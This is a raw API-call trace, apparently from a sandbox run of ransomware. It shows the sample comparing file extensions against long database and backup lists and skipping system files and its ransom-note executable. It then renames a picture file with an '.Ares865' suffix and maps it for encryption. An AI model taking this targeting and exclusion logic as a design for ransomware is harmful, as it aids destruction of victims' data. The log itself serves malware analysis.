lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.718] lstrlenW (lpString="abs") returned 3 [0084.718] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.718] lstrlenW (lpString="abx") returned 3 [0084.718] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.718] lstrlenW (lpString="accdb") returned 5 [0084.718] lstrcmpiW (lpString1="4.bmp", lpString2="accdb") returned -1 [0084.718] lstrlenW (lpString="accdc") returned 5 [0084.718] lstrcmpiW (lpString1="4.bmp", lpString2="accdc") returned -1 [0084.718] lstrlenW (lpString="accde") returned 5 [0084.718] lstrcmpiW (lpString1="4.bmp", lpString2="accde") returned -1 [0084.718] lstrlenW (lpString="accdr") returned 5 [0084.718] lstrcmpiW (lpString1="4.bmp", lpString2="accdr") returned -1 [0084.718] lstrlenW (lpString="accdt") returned 5 [0084.718] lstrcmpiW (lpString1="4.bmp", lpString2="accdt") returned -1 [0084.718] lstrlenW (lpString="accdw") returned 5 [0084.718] lstrcmpiW (lpString1="4.bmp", lpString2="accdw") returned -1 [0084.719] lstrlenW (lpString="accft") returned 5 [0084.719] lstrcmpiW (lpString1="4.bmp", lpString2="accft") returned -1 [0084.719] lstrlenW (lpString="adb") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.719] lstrlenW (lpString="adb") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.719] lstrlenW (lpString="ade") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.719] lstrlenW (lpString="adf") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.719] lstrlenW (lpString="adn") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.719] lstrlenW (lpString="adp") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.719] lstrlenW (lpString="alf") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.719] lstrlenW (lpString="ask") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.719] lstrlenW (lpString="btr") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.719] lstrlenW (lpString="cat") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.719] lstrlenW (lpString="cdb") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.719] lstrlenW (lpString="ckp") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.719] lstrlenW (lpString="cma") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.719] lstrlenW (lpString="cpd") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.719] lstrlenW (lpString="dacpac") returned 6 [0084.719] lstrcmpiW (lpString1="14.bmp", lpString2="dacpac") returned -1 [0084.719] lstrlenW (lpString="dad") returned 3 [0084.719] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.719] lstrlenW (lpString="dadiagrams") returned 10 [0084.719] lstrcmpiW (lpString1="tile14.bmp", lpString2="dadiagrams") returned 1 [0084.719] lstrlenW (lpString="daschema") returned 8 [0084.719] lstrcmpiW (lpString1="le14.bmp", lpString2="daschema") returned 1 [0084.720] lstrlenW (lpString="db-journal") returned 10 [0084.720] lstrcmpiW (lpString1="tile14.bmp", lpString2="db-journal") returned 1 [0084.720] lstrlenW (lpString="db-shm") returned 6 [0084.720] lstrcmpiW (lpString1="14.bmp", lpString2="db-shm") returned -1 [0084.720] lstrlenW (lpString="db-wal") returned 6 [0084.720] lstrcmpiW (lpString1="14.bmp", lpString2="db-wal") returned -1 [0084.720] lstrlenW (lpString="dbc") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.720] lstrlenW (lpString="dbs") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.720] lstrlenW (lpString="dbt") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.720] lstrlenW (lpString="dbv") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.720] lstrlenW (lpString="dbx") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.720] lstrlenW (lpString="dcb") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.720] lstrlenW (lpString="dct") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.720] lstrlenW (lpString="dcx") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.720] lstrlenW (lpString="ddl") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.720] lstrlenW (lpString="dlis") returned 4 [0084.720] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.720] lstrlenW (lpString="dp1") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.720] lstrlenW (lpString="dqy") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.720] lstrlenW (lpString="dsk") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.720] lstrlenW (lpString="dsn") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.720] lstrlenW (lpString="dtsx") returned 4 [0084.720] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.720] lstrlenW (lpString="dxl") returned 3 [0084.720] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.721] lstrlenW (lpString="eco") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.721] lstrlenW (lpString="ecx") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.721] lstrlenW (lpString="edb") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.721] lstrlenW (lpString="epim") returned 4 [0084.721] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.721] lstrlenW (lpString="fcd") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.721] lstrlenW (lpString="fdb") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.721] lstrlenW (lpString="fic") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.721] lstrlenW (lpString="flexolibrary") returned 12 [0084.721] lstrcmpiW (lpString1="ertile14.bmp", lpString2="flexolibrary") returned -1 [0084.721] lstrlenW (lpString="fm5") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.721] lstrlenW (lpString="fmp") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.721] lstrlenW (lpString="fmp12") returned 5 [0084.721] lstrcmpiW (lpString1="4.bmp", lpString2="fmp12") returned -1 [0084.721] lstrlenW (lpString="fmpsl") returned 5 [0084.721] lstrcmpiW (lpString1="4.bmp", lpString2="fmpsl") returned -1 [0084.721] lstrlenW (lpString="fol") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.721] lstrlenW (lpString="fp3") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.721] lstrlenW (lpString="fp4") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.721] lstrlenW (lpString="fp5") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.721] lstrlenW (lpString="fp7") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.721] lstrlenW (lpString="fpt") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.721] lstrlenW (lpString="frm") returned 3 [0084.721] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.722] lstrlenW (lpString="gdb") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.722] lstrlenW (lpString="gdb") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.722] lstrlenW (lpString="grdb") returned 4 [0084.722] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.722] lstrlenW (lpString="gwi") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.722] lstrlenW (lpString="hdb") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.722] lstrlenW (lpString="his") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.722] lstrlenW (lpString="ib") returned 2 [0084.722] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.722] lstrlenW (lpString="idb") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.722] lstrlenW (lpString="ihx") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.722] lstrlenW (lpString="itdb") returned 4 [0084.722] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.722] lstrlenW (lpString="itw") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.722] lstrlenW (lpString="jet") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.722] lstrlenW (lpString="jtx") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.722] lstrlenW (lpString="kdb") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.722] lstrlenW (lpString="kexi") returned 4 [0084.722] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.722] lstrlenW (lpString="kexic") returned 5 [0084.722] lstrcmpiW (lpString1="4.bmp", lpString2="kexic") returned -1 [0084.722] lstrlenW (lpString="kexis") returned 5 [0084.722] lstrcmpiW (lpString1="4.bmp", lpString2="kexis") returned -1 [0084.722] lstrlenW (lpString="lgc") returned 3 [0084.722] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.722] lstrlenW (lpString="lwx") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.723] lstrlenW (lpString="maf") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.723] lstrlenW (lpString="maq") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.723] lstrlenW (lpString="mar") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.723] lstrlenW (lpString="marshal") returned 7 [0084.723] lstrcmpiW (lpString1="e14.bmp", lpString2="marshal") returned -1 [0084.723] lstrlenW (lpString="mas") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.723] lstrlenW (lpString="mav") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.723] lstrlenW (lpString="maw") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.723] lstrlenW (lpString="mdbhtml") returned 7 [0084.723] lstrcmpiW (lpString1="e14.bmp", lpString2="mdbhtml") returned -1 [0084.723] lstrlenW (lpString="mdn") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.723] lstrlenW (lpString="mdt") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.723] lstrlenW (lpString="mfd") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.723] lstrlenW (lpString="mpd") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.723] lstrlenW (lpString="mrg") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.723] lstrlenW (lpString="mud") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.723] lstrlenW (lpString="mwb") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.723] lstrlenW (lpString="myd") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.723] lstrlenW (lpString="ndf") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.723] lstrlenW (lpString="nnt") returned 3 [0084.723] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.723] lstrlenW (lpString="nrmlib") returned 6 [0084.724] lstrcmpiW (lpString1="14.bmp", lpString2="nrmlib") returned -1 [0084.724] lstrlenW (lpString="ns2") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.724] lstrlenW (lpString="ns3") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.724] lstrlenW (lpString="ns4") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.724] lstrlenW (lpString="nsf") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.724] lstrlenW (lpString="nv") returned 2 [0084.724] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.724] lstrlenW (lpString="nv2") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.724] lstrlenW (lpString="nwdb") returned 4 [0084.724] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.724] lstrlenW (lpString="nyf") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.724] lstrlenW (lpString="odb") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.724] lstrlenW (lpString="odb") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.724] lstrlenW (lpString="oqy") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.724] lstrlenW (lpString="ora") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.724] lstrlenW (lpString="orx") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.724] lstrlenW (lpString="owc") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.724] lstrlenW (lpString="p96") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.724] lstrlenW (lpString="p97") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.724] lstrlenW (lpString="pan") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.724] lstrlenW (lpString="pdb") returned 3 [0084.724] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.724] lstrlenW (lpString="pdm") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.725] lstrlenW (lpString="pnz") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.725] lstrlenW (lpString="qry") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.725] lstrlenW (lpString="qvd") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.725] lstrlenW (lpString="rbf") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.725] lstrlenW (lpString="rctd") returned 4 [0084.725] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.725] lstrlenW (lpString="rod") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.725] lstrlenW (lpString="rodx") returned 4 [0084.725] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.725] lstrlenW (lpString="rpd") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.725] lstrlenW (lpString="rsd") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.725] lstrlenW (lpString="sas7bdat") returned 8 [0084.725] lstrcmpiW (lpString1="le14.bmp", lpString2="sas7bdat") returned -1 [0084.725] lstrlenW (lpString="sbf") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.725] lstrlenW (lpString="scx") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.725] lstrlenW (lpString="sdb") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.725] lstrlenW (lpString="sdc") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.725] lstrlenW (lpString="sdf") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.725] lstrlenW (lpString="sis") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.725] lstrlenW (lpString="spq") returned 3 [0084.725] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.725] lstrlenW (lpString="te") returned 2 [0084.725] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.725] lstrlenW (lpString="teacher") returned 7 [0084.726] lstrcmpiW (lpString1="e14.bmp", lpString2="teacher") returned -1 [0084.726] lstrlenW (lpString="tmd") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.726] lstrlenW (lpString="tps") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.726] lstrlenW (lpString="trc") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.726] lstrlenW (lpString="trc") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.726] lstrlenW (lpString="trm") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.726] lstrlenW (lpString="udb") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.726] lstrlenW (lpString="udl") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.726] lstrlenW (lpString="usr") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.726] lstrlenW (lpString="v12") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.726] lstrlenW (lpString="vis") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.726] lstrlenW (lpString="vpd") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.726] lstrlenW (lpString="vvv") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.726] lstrlenW (lpString="wdb") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.726] lstrlenW (lpString="wmdb") returned 4 [0084.726] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.726] lstrlenW (lpString="wrk") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.726] lstrlenW (lpString="xdb") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.726] lstrlenW (lpString="xld") returned 3 [0084.726] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.726] lstrlenW (lpString="xmlff") returned 5 [0084.726] lstrcmpiW (lpString1="4.bmp", lpString2="xmlff") returned -1 [0084.727] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.Ares865") returned 90 [0084.727] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp.ares865"), dwFlags=0x1) returned 1 [0084.728] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.728] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.728] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.728] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.728] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.729] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.729] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.729] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.729] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.731] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.734] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.735] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.735] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0084.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0084.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.735] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.736] CloseHandle (hObject=0x15c) returned 1 [0084.736] CloseHandle (hObject=0x118) returned 1 [0084.736] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.736] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.736] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.736] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdbb95fd7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile15.bmp", cAlternateFileName="")) returned 1 [0084.736] lstrcmpiW (lpString1="usertile15.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.736] lstrcmpiW (lpString1="usertile15.bmp", lpString2="aoldtz.exe") returned 1 [0084.736] lstrcmpiW (lpString1="usertile15.bmp", lpString2=".") returned 1 [0084.736] lstrcmpiW (lpString1="usertile15.bmp", lpString2="..") returned 1 [0084.736] lstrcmpiW (lpString1="usertile15.bmp", lpString2="windows") returned -1 [0084.736] lstrcmpiW (lpString1="usertile15.bmp", lpString2="bootmgr") returned 1 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2="temp") returned 1 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2="pagefile.sys") returned 1 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2="boot") returned 1 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2="ids.txt") returned 1 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2="ntuser.dat") returned 1 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2="perflogs") returned 1 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2="MSBuild") returned 1 [0084.737] lstrlenW (lpString="usertile15.bmp") returned 14 [0084.737] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned 82 [0084.737] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile15.bmp" | out: lpString1="usertile15.bmp") returned="usertile15.bmp" [0084.737] lstrlenW (lpString="usertile15.bmp") returned 14 [0084.737] lstrlenW (lpString="Ares865") returned 7 [0084.737] lstrcmpiW (lpString1="e15.bmp", lpString2="Ares865") returned 1 [0084.737] lstrlenW (lpString=".dll") returned 4 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2=".dll") returned 1 [0084.737] lstrlenW (lpString=".lnk") returned 4 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2=".lnk") returned 1 [0084.737] lstrlenW (lpString=".ini") returned 4 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2=".ini") returned 1 [0084.737] lstrlenW (lpString=".sys") returned 4 [0084.737] lstrcmpiW (lpString1="usertile15.bmp", lpString2=".sys") returned 1 [0084.737] lstrlenW (lpString="usertile15.bmp") returned 14 [0084.737] lstrlenW (lpString="bak") returned 3 [0084.737] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.737] lstrlenW (lpString="ba_") returned 3 [0084.737] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.737] lstrlenW (lpString="dbb") returned 3 [0084.737] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.737] lstrlenW (lpString="vmdk") returned 4 [0084.737] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.737] lstrlenW (lpString="rar") returned 3 [0084.737] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.737] lstrlenW (lpString="zip") returned 3 [0084.737] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.737] lstrlenW (lpString="tgz") returned 3 [0084.737] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.737] lstrlenW (lpString="vbox") returned 4 [0084.738] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.738] lstrlenW (lpString="vdi") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.738] lstrlenW (lpString="vhd") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.738] lstrlenW (lpString="vhdx") returned 4 [0084.738] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.738] lstrlenW (lpString="avhd") returned 4 [0084.738] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.738] lstrlenW (lpString="db") returned 2 [0084.738] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.738] lstrlenW (lpString="db2") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.738] lstrlenW (lpString="db3") returned 3 [0084.738] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 